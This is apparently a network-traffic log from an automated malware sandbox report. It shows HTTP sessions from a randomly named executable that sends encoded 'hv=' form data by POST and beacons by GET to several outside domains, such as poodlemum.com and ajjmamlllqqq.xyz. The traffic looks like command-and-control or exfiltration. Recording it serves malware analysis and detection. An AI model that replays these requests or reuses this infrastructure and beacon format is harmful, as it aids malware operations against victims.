                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.84975076.223.105.230805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:46:57.548335075 CEST352OUTGET /jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.eoghenluire.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:58.032965899 CEST1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:57 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:58.032979012 CEST36INData Raw: 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: </div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.8497513.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:03.065968037 CEST611OUTPOST /17ef/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.poodlemum.com
                                                    Origin: http://www.poodlemum.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.poodlemum.com/17ef/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 4d 6d 59 41 48 31 34 4b 31 75 78 72 2f 79 35 62 43 73 6b 6d 4f 68 4c 74 45 31 2f 6f 54 6d 67 51 35 4e 45 36 6f 47 73 57 33 37 58 53 77 47 42 77 67 58 6e 49 32 70 44 4d 68 53 5a 70 35 4c 33 72 6e 6b 4a 2f 32 54 59 53 49 50 31 55 4f 4d 34 35 6f 43 59 37 78 6e 5a 30 77 57 7a 42 6a 46 64 63 67 42 6d 33 69 30 34 62 32 44 73 66 4b 6a 78 78 2f 75 71 72 5a 6c 61 65 42 70 62 4e 49 38 47 5a 45 6b 68 63 65 6a 49 56 52 32 72 67 43 51 54 45 55 44 56 2b 4c 36 58 36 6f 66 49 66 34 37 2f 65 4f 63 41 76 34 59 62 56 58 71 54 30 36 50 64 6c 49 6d 6c 6f 71 77 39 58 47 70 42 2f 38 54 68 42 69 63 38 32 4c 48 67 3d
                                                    Data Ascii: hv=MmYAH14K1uxr/y5bCskmOhLtE1/oTmgQ5NE6oGsW37XSwGBwgXnI2pDMhSZp5L3rnkJ/2TYSIP1UOM45oCY7xnZ0wWzBjFdcgBm3i04b2DsfKjxx/uqrZlaeBpbNI8GZEkhcejIVR2rgCQTEUDV+L6X6ofIf47/eOcAv4YbVXqT06PdlImloqw9XGpB/8ThBic82LHg=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.8497523.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:05.600378036 CEST631OUTPOST /17ef/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.poodlemum.com
                                                    Origin: http://www.poodlemum.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.poodlemum.com/17ef/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 4d 6d 59 41 48 31 34 4b 31 75 78 72 2f 54 4a 62 41 4e 6b 6d 49 42 4c 71 4c 56 2f 6f 47 32 67 55 35 4e 34 36 6f 45 41 47 33 49 2f 53 7a 6e 78 77 6a 56 50 49 7a 70 44 4d 75 79 59 68 6b 37 32 6c 6e 6b 56 42 32 54 6b 53 49 50 78 55 4f 49 30 35 39 6c 30 34 77 33 5a 32 39 32 7a 44 74 6c 64 63 67 42 6d 33 69 30 73 68 32 44 30 66 4c 53 42 78 34 2f 71 71 55 46 61 66 47 70 62 4e 4d 38 47 64 45 6b 67 35 65 69 56 77 52 7a 33 67 43 56 33 45 55 53 56 39 42 36 58 38 6c 2f 4a 57 35 4f 4b 61 49 64 4d 49 31 49 7a 33 58 4d 50 71 2f 35 77 50 53 45 74 75 70 77 56 38 47 71 70 4a 35 6b 38 70 34 2f 73 47 56 51 32 6b 78 6e 70 61 4b 62 38 62 31 73 41 35 77 78 30 57 65 74 6c 36
                                                    Data Ascii: hv=MmYAH14K1uxr/TJbANkmIBLqLV/oG2gU5N46oEAG3I/SznxwjVPIzpDMuyYhk72lnkVB2TkSIPxUOI059l04w3Z292zDtldcgBm3i0sh2D0fLSBx4/qqUFafGpbNM8GdEkg5eiVwRz3gCV3EUSV9B6X8l/JW5OKaIdMI1Iz3XMPq/5wPSEtupwV8GqpJ5k8p4/sGVQ2kxnpaKb8b1sA5wx0Wetl6


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.8497533.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:08.128249884 CEST1648OUTPOST /17ef/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.poodlemum.com
                                                    Origin: http://www.poodlemum.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.poodlemum.com/17ef/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 4d 6d 59 41 48 31 34 4b 31 75 78 72 2f 54 4a 62 41 4e 6b 6d 49 42 4c 71 4c 56 2f 6f 47 32 67 55 35 4e 34 36 6f 45 41 47 33 4f 6e 53 77 56 35 77 67 30 50 49 77 70 44 4d 77 43 59 69 6b 37 32 6f 6e 6b 4e 64 32 54 6f 73 49 4d 46 55 4f 74 6f 35 35 67 41 34 2b 48 5a 32 68 47 7a 43 6a 46 64 7a 67 46 4b 7a 69 30 38 68 32 44 30 66 4c 51 5a 78 72 4f 71 71 48 31 61 65 42 70 62 4a 49 38 47 6c 45 6b 70 45 65 69 52 4b 51 48 37 67 42 31 6e 45 53 6b 35 39 44 61 58 2b 6b 2f 4a 4f 35 4f 4f 56 49 64 51 75 31 49 33 4e 58 4c 6a 71 38 4d 64 30 4b 31 59 30 72 68 78 74 47 59 64 57 34 57 73 62 2f 76 77 70 49 77 57 72 6e 68 4e 69 4a 34 77 55 78 63 30 77 73 56 63 42 51 49 34 61 53 4f 54 6d 71 55 4b 7a 66 51 31 4c 62 73 6d 34 4f 58 45 6b 34 68 62 43 6c 74 52 52 69 70 6a 53 55 32 44 74 55 48 73 4a 76 41 63 7a 54 71 4d 56 45 39 2f 39 51 52 4e 31 34 53 55 4c 72 4f 6e 35 73 78 5a 6b 6d 5a 7a 69 36 44 49 6d 49 68 4a 72 79 61 34 71 42 5a 53 44 77 6e 66 59 71 62 78 56 48 62 30 50 30 72 51 55 4a 6c 46 4a 75 54 75 50 31 6c 51 [TRUNCATED]
                                                    Data Ascii: hv=MmYAH14K1uxr/TJbANkmIBLqLV/oG2gU5N46oEAG3OnSwV5wg0PIwpDMwCYik72onkNd2TosIMFUOto55gA4+HZ2hGzCjFdzgFKzi08h2D0fLQZxrOqqH1aeBpbJI8GlEkpEeiRKQH7gB1nESk59DaX+k/JO5OOVIdQu1I3NXLjq8Md0K1Y0rhxtGYdW4Wsb/vwpIwWrnhNiJ4wUxc0wsVcBQI4aSOTmqUKzfQ1Lbsm4OXEk4hbCltRRipjSU2DtUHsJvAczTqMVE9/9QRN14SULrOn5sxZkmZzi6DImIhJrya4qBZSDwnfYqbxVHb0P0rQUJlFJuTuP1lQxLRG6garccukv42PvgC3Uw6vx1rAACE3U813nMmeWhgmnz4vfccylPjivEo3bmoJet9Pcc/fXCVLxt8xhI4O+bHdEid8Y0CngLAK13N885h4LM8giujKSTnjBGDQpQQydBfJyr1jz3KrJeRHkpw02l6l5O94AxZ5ZAMXAMxcn2VaU5RErBwfs/sPMKMnkPMPpLK4WM5/ZorGrN3AbAnZqyu0cZ5voHhvxgPR4Jmu7WnZ0Slg1c6euNTobb+OT2YxHio9W0aq5KwA1K3OOKsVnEWivwgIoxPmANRH93kB0uX4xDcNpQRo3aDuvxgyg9b+F4vAyKxugobl6k7ESbEeiICcEFs+WsYkM8AgYJngbInG2HyYrYqnUttnjoOM5s01V+GfDW6r1ChNbDnE47lvN5w6mdOVfDJmPt9GsiHiiP9psTjixkNTHnLeFh9KPFf5mY12PYQeZAvfiliIHqAAKZqt7EAzorWJj2p5QQLXc3xOjvBxcFJAK/z/A1yGTh/g8nSByJuHVAaDlNmP3TonhjyZTBmR03RaDFj6DiNZjVNU2qbUl7LPPqPsGliWTm8DFlvDQtuIqZTYvI5SvijkL54RcISpuMIBY6S9W0zc4bZ5HfE8sezG7ZHCnr1jhpLVk6RuqOk8fqCpMRn2O7iCZ54EszNCpPEDvS [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.8497543.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:10.657994032 CEST350OUTGET /17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.poodlemum.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:47:12.043147087 CEST404INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:47:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 76 3d 42 6b 77 67 45 44 4d 37 32 70 6c 6b 31 53 6f 4e 64 76 38 70 4f 46 58 2f 59 30 4c 31 59 30 77 4d 79 2b 34 64 76 78 77 6f 2f 4f 6a 2f 38 30 77 68 33 57 76 62 37 2b 7a 71 74 6a 64 58 79 49 6d 51 6c 32 4a 6e 76 79 34 38 42 4b 68 6a 46 76 73 63 77 68 30 6b 33 54 46 72 33 57 7a 6f 6e 57 74 50 33 43 69 4b 37 32 45 6d 31 54 70 37 4c 51 56 74 6f 2f 48 53 45 58 4b 5a 47 5a 2b 2b 41 70 37 70 47 67 3d 3d 26 53 62 7a 64 62 3d 44 76 67 58 57 64 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.84975535.244.172.47805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:17.385404110 CEST620OUTPOST /5lw2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Origin: http://www.ajjmamlllqqq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.ajjmamlllqqq.xyz/5lw2/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 76 47 36 6f 72 4b 79 43 38 64 57 78 48 79 64 6a 68 55 56 57 54 76 4e 65 62 75 34 70 59 4a 76 6a 37 77 37 35 6f 4f 38 2b 59 55 48 6e 76 4c 4d 43 76 49 75 70 62 58 63 4b 70 73 61 61 39 48 4b 32 72 78 47 79 51 2b 4f 67 4c 69 69 31 54 79 56 70 51 48 4f 6d 68 42 79 46 73 64 46 35 79 42 35 61 63 42 63 6c 2b 56 61 46 6d 61 30 66 52 7a 43 31 74 68 49 6a 76 6b 4e 55 4f 74 52 47 72 4a 5a 4b 72 4c 51 66 34 6c 49 73 4e 57 48 67 6a 55 39 48 56 50 43 6b 50 4e 67 75 37 45 59 4b 45 62 2f 37 61 34 50 38 66 78 6c 36 33 65 70 36 52 35 39 41 6d 67 76 2f 2f 78 71 57 32 6d 72 76 53 2b 43 6f 6f 56 46 34 4f 63 6f 3d
                                                    Data Ascii: hv=vG6orKyC8dWxHydjhUVWTvNebu4pYJvj7w75oO8+YUHnvLMCvIupbXcKpsaa9HK2rxGyQ+OgLii1TyVpQHOmhByFsdF5yB5acBcl+VaFma0fRzC1thIjvkNUOtRGrJZKrLQf4lIsNWHgjU9HVPCkPNgu7EYKEb/7a4P8fxl63ep6R59Amgv//xqW2mrvS+CooVF4Oco=
                                                    Jul 1, 2024 15:47:18.029994965 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:17 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:18.033622980 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.84975635.244.172.47805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:19.923675060 CEST640OUTPOST /5lw2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Origin: http://www.ajjmamlllqqq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.ajjmamlllqqq.xyz/5lw2/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 76 47 36 6f 72 4b 79 43 38 64 57 78 47 53 4e 6a 6d 33 4e 57 57 50 4e 66 48 2b 34 70 53 70 75 6b 37 77 33 35 6f 4d 52 7a 59 47 7a 6e 75 70 6b 43 2b 39 53 70 59 58 63 4b 78 38 61 66 7a 6e 4b 39 72 78 4b 36 51 2b 69 67 4c 69 32 31 54 79 6c 70 52 77 36 6e 67 52 79 48 6a 39 46 6f 76 78 35 61 63 42 63 6c 2b 56 66 75 6d 61 38 66 52 43 53 31 76 45 6b 67 69 45 4e 54 47 4e 52 47 68 70 59 42 72 4c 51 78 34 6b 55 43 4e 55 50 67 6a 51 31 48 56 63 61 6a 46 4e 67 6f 6c 30 5a 47 50 4c 71 33 51 4b 33 46 64 43 67 59 77 74 51 44 5a 76 51 71 38 43 6e 35 38 78 43 39 32 6c 44 5a 58 4a 66 41 79 32 56 49 51 4c 2b 59 44 77 73 33 63 36 46 54 34 38 75 72 2b 52 56 36 56 66 43 41
                                                    Data Ascii: hv=vG6orKyC8dWxGSNjm3NWWPNfH+4pSpuk7w35oMRzYGznupkC+9SpYXcKx8afznK9rxK6Q+igLi21TylpRw6ngRyHj9Fovx5acBcl+Vfuma8fRCS1vEkgiENTGNRGhpYBrLQx4kUCNUPgjQ1HVcajFNgol0ZGPLq3QK3FdCgYwtQDZvQq8Cn58xC92lDZXJfAy2VIQL+YDws3c6FT48ur+RV6VfCA
                                                    Jul 1, 2024 15:47:20.593511105 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:20.595818996 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.84975735.244.172.47805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:22.457798958 CEST1657OUTPOST /5lw2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Origin: http://www.ajjmamlllqqq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.ajjmamlllqqq.xyz/5lw2/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 76 47 36 6f 72 4b 79 43 38 64 57 78 47 53 4e 6a 6d 33 4e 57 57 50 4e 66 48 2b 34 70 53 70 75 6b 37 77 33 35 6f 4d 52 7a 59 47 4c 6e 75 59 45 43 73 75 36 70 57 33 63 4b 39 63 61 65 7a 6e 4b 6b 72 77 69 45 51 2b 65 77 4c 67 4f 31 53 52 74 70 45 78 36 6e 75 68 79 48 68 39 45 76 79 42 34 65 63 41 73 36 2b 56 50 75 6d 61 38 66 52 42 61 31 72 52 49 67 67 45 4e 55 4f 74 52 61 72 4a 5a 6d 72 4c 35 4d 34 6b 51 38 4d 6b 76 67 69 78 4a 48 54 75 43 6a 4a 4e 67 71 6b 30 59 62 50 4c 33 31 51 4b 37 2f 64 42 39 31 77 74 34 44 54 71 70 2b 34 33 48 4e 67 43 69 52 2f 47 50 52 53 2b 76 38 73 33 45 36 62 72 43 56 42 51 30 4d 62 36 46 70 73 76 50 66 70 6d 6c 58 62 34 72 30 69 58 48 34 64 50 48 6b 66 64 66 6d 62 67 7a 2b 56 32 6b 45 69 59 2f 4d 53 62 72 78 63 39 64 36 6e 39 4b 57 34 56 53 34 61 4e 43 72 6a 4b 6e 67 6c 4b 75 61 66 43 33 52 46 7a 77 58 38 30 54 50 50 41 4d 6d 4a 73 62 33 31 48 61 55 63 56 50 33 77 51 55 47 64 4d 6d 71 38 61 6f 73 53 78 2b 47 67 79 62 74 56 78 68 4a 45 77 78 6a 57 33 76 75 35 72 55 [TRUNCATED]
                                                    Data Ascii: hv=vG6orKyC8dWxGSNjm3NWWPNfH+4pSpuk7w35oMRzYGLnuYECsu6pW3cK9caeznKkrwiEQ+ewLgO1SRtpEx6nuhyHh9EvyB4ecAs6+VPuma8fRBa1rRIggENUOtRarJZmrL5M4kQ8MkvgixJHTuCjJNgqk0YbPL31QK7/dB91wt4DTqp+43HNgCiR/GPRS+v8s3E6brCVBQ0Mb6FpsvPfpmlXb4r0iXH4dPHkfdfmbgz+V2kEiY/MSbrxc9d6n9KW4VS4aNCrjKnglKuafC3RFzwX80TPPAMmJsb31HaUcVP3wQUGdMmq8aosSx+GgybtVxhJEwxjW3vu5rUsIJZPCE9EgG8G3QuOSvYrYdUZ5oMDXJQC3efOV17nv/kJCZa9DT+tBaoSRD9GxeB57a0qeTpU/Vi58Aw4Dctn2mSEkh19WYU41EIDcE1WgpBaZOebLn29COEVu4RSFn1opj8GexzgcHrXFHRBh2v8USpsUzWLFUxgIv90OtYKyUa8AA6CdfpFekmVphG+AWIw7Z7920cSN9gF4W0D+u61xEs97ItPRokg2gd1GdIJtOZ9czvonAIumtNc/CqJfsecCAbwnrWmDfvoFCniOeYa/HVd9VAY0m3tjfCOw7NvwdsB84y0mrbi9zy2qIUCMWj4FiYw6V5X9XHH9gUKjWAqzj6k1oIx7IK/IsJxZMmsbNAc8YZ7cK0gc32yPmgceTnOWROGvPOB3rp409gcpBWkVrU5NBqd6UO+Yd313u9qFVT9jRhgl3PBfgYgApliom2D7S9iXnonxb4bP0ieuSepRj3obZziKTEKqaYmEtaKrDsblYoqKoV3g4cMpYcLZtICzaIA4GYU+/wcPn1g1Gm4Yg3c9YL22n1rESmlMThS7mbF+Ttge2/a/jH4At5MaG500VW3bLfJUmQqj8QRLQ0OlGc4mCGwgiDSBQyj534Eqp2BzxKi4KjvTGSQWVdLQZWHAR4niSA6s1byzmz00g/UtIsLVjIAiADuy [TRUNCATED]
                                                    Jul 1, 2024 15:47:23.099662066 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:23.103111982 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.84975835.244.172.47805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:47:24.986584902 CEST353OUTGET /5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:47:25.629106045 CEST300INHTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
